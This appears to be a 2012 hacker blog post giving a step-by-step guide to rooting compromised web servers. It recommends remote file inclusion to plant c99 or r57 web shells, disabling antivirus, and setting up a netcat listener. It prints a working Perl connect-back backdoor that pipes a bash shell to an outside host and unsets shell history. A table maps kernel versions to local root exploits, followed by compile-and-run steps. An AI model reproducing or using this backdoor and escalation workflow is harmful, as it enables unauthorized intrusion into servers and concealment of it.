BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly


Saturday, January 28, 2012

rooting Guide


Shell Access on a website is the first thing you will need. How you gain this access
is entirely up to you. I would say most people will end up going with a simple remote
file inclusion and place yourself a c99, r57, locust or any shell of your choice.

You will want to get yourself a version of NetCat Which you can find at this location

If you have an antivirus that auto deletes infected files or virii i would suggest disabling
it as some av's will detect netcat as a hacktool or remote admin tool. Once you have downloaded
netcat open netcat up and it will ask you to enter a string for the command line. Reading up on
netcat is recommended but if your lazy a string like this will do just fine

-vv -l -n -p 

From there you will want to aquire a nice back-connect. I preffer to use one thats not
in the shell because i find that those back connects work shitty so i will provide you
with one that i use. Very simple to use just save as "" then upload to server and 
end execute. 


use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell                
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90                                                                               
#lord@SlackwareLinux:/home/programing$ perl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#Usage: [Host] [Port]
#Ex: 2121
#lord@SlackwareLinux:/home/programing$ perl 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#[*] Resolving HostName
#[*] Connecting...
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [] from localhost [] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#uid=1001(lord) gid=100(users) groups=100(users)
$system = '/bin/bash';
$ARGC=@ARGV; print "IHS BACK-CONNECT BACKDOOR\n\n"; if ($ARGC!=2) { 
   print "Usage: $0 [Host] [Port] \n\n"; 
   die "Ex: $0 2121 \n"; } use Socket; use FileHandle; 
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
open(STDIN, ">&SOCKET"); 
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 

**Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to 
forward the to what ever the ip of your computer is. You can check this by opening 
command prompt and typing ipconfig you should get an ip that looks similar to
which is the ip to forward to. If you are unsure about how to forward your port check out this site and
find your router model.

So Now that you have your tools and you have your shell access open up netcat and type in -vv -l -n -p 8080
for this tutorial we will connect on port 8080. Hit enter and it should start listening. 

Go back to the server and upload your Execute the back connect with a command such as perl 8080.
once you execute this you can go back to the shell and it should have connected. With this particular back connect
you don't have to find the kernel version because it displays it for you once it connects, but for those of you who
are using a different back connect to find the os kernel version and userid you can type something like this into the
shell and it will give you the info.

uname -a;id

Once executed you will see something probably similar to

Linux 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The important information here that you want is the OS & Kernel Ver. which in this case would be
Linux and the kernel ver. is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly
old. which is a good thing for us.

Here is a kernel refrence for you all this will tell you what exploits work for the differenet kernels.
just to give you a general idea. note that this refrence is kind of old but is still pretty accurate but
there could be newer exploits now.

2.2 ->  ptrace2.4.17 -> newlocal, kmod, uselib242.4.18 -> brk, brk2, newlocal, kmod2.4.19 -> brk, brk2, newlocal, kmod2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk22.4.21 -> brk, brk2, ptrace, ptrace-kmod2.4.22 -> brk, brk2, ptrace, ptrace-kmod2.4.22-10 -> loginx2.4.23 -> mremap_pte2.4.24 -> mremap_pte, uselib242.4.25-1 -> uselib242.4.27 -> uselib242.6.2 -> mremap_pte, krad, h00lyshit2.6.5 -> krad, krad2, h00lyshit2.6.6 -> krad, krad2, h00lyshit2.6.7 -> krad, krad2, h00lyshit2.6.8 -> krad, krad2, h00lyshit2.6.8-5 -> krad2, h00lyshit2.6.9 -> krad, krad2, h00lyshit2.6.9-34 -> r00t, h00lyshit2.6.10 -> krad, krad2, h00lyshit2.6.13 -> raptor, raptor2, h0llyshit, prctl2.6.14 -> raptor, raptor2, h0llyshit, prctl2.6.15 -> raptor, raptor2, h0llyshit, prctl2.6.16 -> raptor, raptor2, h0llyshit, prctl2.6.23 - 2.6.24 -> diane_lane_fucked_hard.c2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

Once you have found the Kernel ver. of the server you are about to root you need to find the Local Root Exploit
for that kernel which you can find with google using the list above. Once you have found your Exploit you will want
to compile it assuming it's in c which most are. To compile your xpl.c what you want to do is place the xpl.c on the
server where you placed you and then compile it. To Compile your c scripts go to your shell that you have
spawned with netcat and type:
gcc xpl.c -o xpl

This will compile your xpl.c to a file named xpl.

From here now all you have to do is run your exploit which can be done by simply typing in your netcat connection


it should execute the exploit file which you have just compiled and give you root depending on what the exploit requires.
some require nothing but running them. others such as h0llyshit require a large file to exploit or to be made to exploit. 
but this is just to explain how to root. you can read up on h0llyshit from here if you would like.

©2011, copyright BLACK BURN


Post a Comment


7 Years Earning Experience

The Earning Source You Can Trust

Follow by Email